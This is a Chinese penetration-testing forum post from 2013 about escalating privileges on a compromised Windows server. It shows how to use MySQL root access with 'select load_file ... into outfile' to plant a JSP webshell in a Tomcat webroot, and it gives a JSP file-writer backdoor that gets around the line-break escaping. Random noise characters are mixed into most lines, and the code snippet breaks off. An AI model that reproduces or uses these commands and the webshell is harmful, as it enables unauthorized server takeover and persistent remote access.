找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 解决Win下MySQL root导出Webshell换行符问题
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2422|回复: 0
打印 上一主题 下一主题

解决Win下MySQL root导出Webshell换行符问题

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-3-8 21:52:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
今天碰到了这么个问题,简单记录一下我的解决方案。' Y" L' A! r7 [( S2 F* o

0 g: `# O- G+ z首先说一下服务器的环境。服务器的80端口按照标准的虚拟主机来配置的,支持asp,aspx,php,但是不支持php! _/ r, f' I$ }8 j( v& r  s
安装了mssql(1433端口),tomcat(8080端口),serv-u(43958端口)和两个mysql(3306端口和3307端口)
; r1 ?7 ?3 x# y& I% v! k7 G$ x提权的时候没有sa密码,没有serv-u密码,mysql 5.1首先运行了
) {* t. m8 t6 B& k& u1 show variables like '%plugin%';5 ^9 q2 G1 n+ v
后,根据设置导出dll到C:\Program Files\MySQL\MySQL Server 5.1\lib\成功7 M4 h# ^0 `6 r9 P
创建自定义函数似乎被拦截,一直失败。
, N$ q; k- X0 J, Z后找到tomcat目录,准备写马,asp,aspx,php对tomcat目录:C:/Program Files/cngradms_x86/tomcat/webapps/ROOT/均无写入权限
# O8 N4 Z- p* n5 B+ O测试mysql有写入权限。故上传jsp大马至网站web目录:d:\xxx\fuck.jsp
4 g1 Q# A% Y! f" u( z" Z用mysql执行语句:; x6 l, E+ d' b5 L! i
1 select load_file('d:\\xxx\\fuck.jsp')  into outfile 'C:\\Program Files\\cngradms_x86\\tomcat\\webapps\\ROOT\\upload\\fuck.jsp'
0 ~1 x- c( G, b( L2 e4 Q- S/ |2 复制代码+ k' C4 Y- V. h: }* t  r
后成功。
& u- C1 i) r- n$ K" }, R) b; I5 p7 O  }1 M但是访问后得到如下提示:
" x% y: [2 Z; |: ?! E- }2 G​500页面$ T4 Q  a  d9 G; B& r6 L

0 M" R* t0 F4 o/ r4 S
( s& z% ^) x/ I3 g* g! K明显是MySQL的Win下版本自动添加转义符\n\r了
+ H9 q6 h0 M$ F; Q1 w! Q这样导致程序运行的悲剧。
. ^  P' l; x7 V0 \, M从网上找了很多方法,什么update把转义符消掉,enclose巴拉巴拉,反正五花八门就是没一个可以用的。' }  ?, m, u1 N% Y$ O
最后弄了这么个小脚本:
( [$ K' j5 O" T' y01 <%@ page language="java" pageEncoding="gbk"%>
3 e4 l% s7 V: p( Y02 <jsp:directive.page import="java.io.File"/>
% [  @5 x4 s& O( r" O! ~03 <jsp:directive.page import="java.io.OutputStream"/>* a# _+ _4 C3 Y/ M. y- F
04 <jsp:directive.page import="java.io.FileOutputStream"/>
& e! H& Q1 O/ H& p+ y7 x0 P3 P05 <% int i=0;String method=request.getParameter("act");if(method!=null&&method.equals("yoco")){String url=request.getParameter("url");String text=request.getParameter("smart");File f=new File(url);if(f.exists()){f.delete();}try{OutputStream o=new FileOutputStream(f);o.write(text.getBytes());o.close();}catch(Exception e){i++;%>
$ f0 C" Z* k5 j06 error www.2cto.com) V" V! ?; K4 q9 x  Y0 c  [
07 <%}}if(i==0){%>
" @+ i: T& Z0 @; Q- X8 u08 ok
% O2 K9 j# L# U/ V& o9 i: W% i: e3 i09 <%}%>& b9 {1 x7 Q1 o! X* }- ^
10 <form action='?act=yoco' method='post'><input size="100" value="<%=application.getRealPath("/") %>" name="url"><br><textarea rows="20" cols="80" name="smart">4 l: z( x1 m1 e2 V  z6 ^$ j& o
就可以避免转义符让JSP的马儿运行500错误了。
" j1 E9 R% z% V  P' \# O6 `
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表